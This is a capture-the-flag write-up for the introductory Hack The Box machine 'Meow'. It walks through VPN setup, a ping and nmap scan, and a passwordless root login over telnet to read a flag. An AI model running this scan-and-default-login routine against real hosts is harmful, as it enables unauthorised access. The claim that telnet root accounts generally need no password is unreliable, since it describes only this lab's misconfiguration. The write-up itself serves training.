Skip to main content

Command Palette

Search for a command to run...

Meow write-up [HacktheBox]

Updated
•8 min read•View as Markdown
Meow write-up [HacktheBox]
X

A software engineer with an inclination towards security. I like to simplify the things I know so you can understand them better, the gods must be crazy!! Top Tier!!

This article is going to cover how to go about capturing Meow, the first machine on Tier 0, from Hack The Box, with an introductory part on how to set up your VPN.

Setting up connection

When visiting the starting point lab's page, one is prompted to either connect to the target machine via the Pwnbox connection or a VPN configuration file that is downloaded and run through the terminal. Connecting to the target via Pwnbox is direct and requires no extra steps, while the VPN connection requires the following steps.

  1. Download the .ovpn file from the site.
  2. Open a terminal window from the terminal icon onthe desktop
  3. Navigate to the Downloads directory using ls and cd commands, which list and change directories, respectively.
  4. Confirm your .ovpn file was downloaded by using the ls again and once you've seen it copy the filename without any whitespace
  5. Lastly, run sudo openvpn {filename} pasting the copied selection in place of the filename and let the configuration file run until "Initialization Sequence Completed" is displayed on the screen as shown below.
┌──(root㉿kali)-[~]
└─# ls
Delashoo  Documents  gitkey      Music     Public     Videos
Desktop   Downloads  gitkey.pub  Pictures  Templates

┌──(root㉿kali)-[~]
└─# cd Downloads

┌──(root㉿kali)-[~/Downloads]
└─# ls
BIKE1.jpeg  code_1.72.2-1665614327_amd64.deb  starting_point_delashoo.ovpn

┌──(root㉿kali)-[~/Downloads]
└─# openvpn starting_point_delashoo.ovpn
2022-10-31 18:03:06 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2022-10-31 18:03:06 OpenVPN 2.5.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Jul  5 2022
2022-10-31 18:03:06 library versions: OpenSSL 3.0.5 5 Jul 2022, LZO 2.10
2022-10-31 18:03:06 Outgoing Control Channel Authentication: Using 256 bit message hash 'SHA256' for HMAC authentication
2022-10-31 18:03:06 Incoming Control Channel Authentication: Using 256 bit message hash 'SHA256' for HMAC authentication
2022-10-31 18:03:06 TCP/UDP: Preserving recently used remote address: [AF_INET]23.19.225.248:1337
2022-10-31 18:03:06 Socket Buffers: R=[212992->212992] S=[212992->212992]
2022-10-31 18:03:06 UDP link local: (not bound)
2022-10-31 18:03:06 UDP link remote: [AF_INET]23.19.225.248:1337
2022-10-31 18:03:06 TLS: Initial packet from [AF_INET]23.19.225.248:1337, sid=500341f5 6e2600e4
2022-10-31 18:03:07 VERIFY OK: depth=1, CN=HackTheBox
2022-10-31 18:03:07 VERIFY KU OK
2022-10-31 18:03:07 Validating certificate extended key usage
2022-10-31 18:03:07 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2022-10-31 18:03:07 VERIFY EKU OK
2022-10-31 18:03:07 VERIFY OK: depth=0, CN=htb
2022-10-31 18:03:07 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, peer certificate: 2048 bit RSA, signature: RSA-SHA256
2022-10-31 18:03:07 [htb] Peer Connection Initiated with [AF_INET]23.19.225.248:1337
2022-10-31 18:03:07 PUSH: Received control message: 'PUSH_REPLY,route 10.10.10.0 255.255.254.0,route 10.129.0.0 255.255.0.0,route-ipv6 dead:beef::/64,tun-ipv6,route-gateway 10.10.14.1,topology subnet,ping 10,ping-restart 120,ifconfig-ipv6 dead:beef:2::1047/64 dead:beef:2::1,ifconfig 10.10.14.73 255.255.254.0,peer-id 39,cipher AES-256-CBC'
2022-10-31 18:03:07 OPTIONS IMPORT: timers and/or timeouts modified
2022-10-31 18:03:07 OPTIONS IMPORT: --ifconfig/up options modified
2022-10-31 18:03:07 OPTIONS IMPORT: route options modified
2022-10-31 18:03:07 OPTIONS IMPORT: route-related options modified
2022-10-31 18:03:07 OPTIONS IMPORT: peer-id set
2022-10-31 18:03:07 OPTIONS IMPORT: adjusting link_mtu to 1625
2022-10-31 18:03:07 OPTIONS IMPORT: data channel crypto options modified
2022-10-31 18:03:07 Data Channel: using negotiated cipher 'AES-256-CBC'
2022-10-31 18:03:07 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2022-10-31 18:03:07 Outgoing Data Channel: Using 256 bit message hash 'SHA256' for HMAC authentication
2022-10-31 18:03:07 Incoming Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2022-10-31 18:03:07 Incoming Data Channel: Using 256 bit message hash 'SHA256' for HMAC authentication
2022-10-31 18:03:07 net_route_v4_best_gw query: dst 0.0.0.0
2022-10-31 18:03:07 net_route_v4_best_gw result: via 10.0.2.2 dev eth0
2022-10-31 18:03:07 ROUTE_GATEWAY 10.0.2.2/255.255.255.0 IFACE=eth0 HWADDR=08:00:27:db:96:6a
2022-10-31 18:03:07 GDG6: remote_host_ipv6=n/a
2022-10-31 18:03:07 net_route_v6_best_gw query: dst ::
2022-10-31 18:03:07 sitnl_send: rtnl: generic error (-101): Network is unreachable
2022-10-31 18:03:07 ROUTE6: default_gateway=UNDEF
2022-10-31 18:03:07 TUN/TAP device tun0 opened
2022-10-31 18:03:07 net_iface_mtu_set: mtu 1500 for tun0
2022-10-31 18:03:07 net_iface_up: set tun0 up
2022-10-31 18:03:07 net_addr_v4_add: 10.10.14.73/23 dev tun0
2022-10-31 18:03:07 net_iface_mtu_set: mtu 1500 for tun0
2022-10-31 18:03:07 net_iface_up: set tun0 up
2022-10-31 18:03:07 net_addr_v6_add: dead:beef:2::1047/64 dev tun0
2022-10-31 18:03:07 net_route_v4_add: 10.10.10.0/23 via 10.10.14.1 dev [NULL] table 0 metric -1
2022-10-31 18:03:07 net_route_v4_add: 10.129.0.0/16 via 10.10.14.1 dev [NULL] table 0 metric -1
2022-10-31 18:03:07 add_route_ipv6(dead:beef::/64 -> dead:beef:2::1 metric -1) dev tun0
2022-10-31 18:03:07 net_route_v6_add: dead:beef::/64 via :: dev tun0 table 0 metric -1
2022-10-31 18:03:07 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
2022-10-31 18:03:07 Initialization Sequence Completed

Now that the connection is established through the VPN, next step is Enumeration.

Enumeration

In this step, one creates an active connection to the target system and performs queries to gain more information. After connecton is established, we can ping the target's IP address to see if there's connection between the machines by running the following on the terminal.

┌──(root㉿kali)-[~]
└─# ping 10.129.114.29
PING 10.129.114.29 (10.129.114.29) 56(84) bytes of data.
64 bytes from 10.129.114.29: icmp_seq=1 ttl=63 time=214 ms
64 bytes from 10.129.114.29: icmp_seq=2 ttl=63 time=218 ms
64 bytes from 10.129.114.29: icmp_seq=3 ttl=63 time=215 ms
64 bytes from 10.129.114.29: icmp_seq=4 ttl=63 time=215 ms
^C
--- 10.129.114.29 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3000ms
rtt min/avg/max/mdev = 214.091/215.655/218.486/1.709 ms

Since ping is a continuous service, one can use -c flag followed by the number of packets to send as shown below.

┌──(root㉿kali)-[~]
└─# ping -c3 10.129.114.29
PING 10.129.114.29 (10.129.114.29) 56(84) bytes of data.
64 bytes from 10.129.114.29: icmp_seq=1 ttl=63 time=213 ms
64 bytes from 10.129.114.29: icmp_seq=2 ttl=63 time=215 ms
64 bytes from 10.129.114.29: icmp_seq=3 ttl=63 time=214 ms

--- 10.129.114.29 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 212.814/213.776/214.759/0.794 ms

Now that the connection has been formed and is stable, next step is to scan all of the target's ports to determine what services are running on it by using the nmap script. Nmap stands for network mapper and functions by sending requests to the target's port in determining which ports are open. Some ports are used by default by certain services like tcp while others might be non-standard necessitating the use of -sV flag to determine the service version(name and description) of the identified services. -v gives the verbose information, I just like to use it.

┌──(root㉿kali)-[~]
└─# nmap -sC -sV -v 10.129.114.29
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 18:24 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:24
Completed NSE at 18:24, 0.00s elapsed
Initiating NSE at 18:24
Completed NSE at 18:24, 0.00s elapsed
Initiating NSE at 18:24
Completed NSE at 18:24, 0.00s elapsed
Initiating Ping Scan at 18:24
Scanning 10.129.114.29 [4 ports]
Completed Ping Scan at 18:24, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:24
Completed Parallel DNS resolution of 1 host. at 18:24, 0.01s elapsed
Initiating SYN Stealth Scan at 18:24
Scanning 10.129.114.29 [1000 ports]
Discovered open port 23/tcp on 10.129.114.29
Completed SYN Stealth Scan at 18:24, 2.97s elapsed (1000 total ports)
Initiating Service scan at 18:24
Scanning 1 service on 10.129.114.29
Completed Service scan at 18:24, 10.49s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.114.29.
Initiating NSE at 18:24
Completed NSE at 18:24, 10.46s elapsed
Initiating NSE at 18:24
Completed NSE at 18:24, 0.00s elapsed
Initiating NSE at 18:24
Completed NSE at 18:24, 0.00s elapsed
Nmap scan report for 10.129.114.29
Host is up (0.32s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 18:24
Completed NSE at 18:24, 0.00s elapsed
Initiating NSE at 18:24
Completed NSE at 18:24, 0.00s elapsed
Initiating NSE at 18:24
Completed NSE at 18:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.34 seconds
           Raw packets sent: 1005 (44.196KB) | Rcvd: 1002 (40.084KB)

From the above scan we discovered an open port 23 that offers Telnet service, a network protocol used to virtually access a computer and to provide a two-way, collaborative text-based channel between them by use of TCP/IP networking protocol. Since this port is open, the target can receive telnet connection requests from other hosts in the network. One can access telnet services by running telnet + IP address of the target from the terminal.

┌──(root㉿kali)-[~]
└─# telnet 10.129.114.29
Trying 10.129.114.29...
Connected to 10.129.114.29.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Foothold

In this step, we ensure we have access to the target's system. Telnet connections are configured with username/password combinations for security purposes with an exception of the root user account that does not require password for access. This is what we'll use to get access to the machine and check on the files in it.

Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 31 Oct 2022 10:30:43 PM UTC

  System load:           0.0
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             138
  Users logged in:       0
  IPv4 address for eth0: 10.129.114.29
  IPv6 address for eth0: dead:beef::250:56ff:feb9:7e27


75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~# ls
flag.txt  snap
root@Meow:~# cat flag.txt
b40abdfe23664587f9c61ecba8a4c19
root@Meow:~#

After listing the files, we find flag.txt which contains the root flag to be captured in this case thus we use cat command to print it out, copy and submit it to the site as evidence.

NB I changed the flag contents in attempts to motivate you to capture the real one, have a ice time with and see you on Fawn!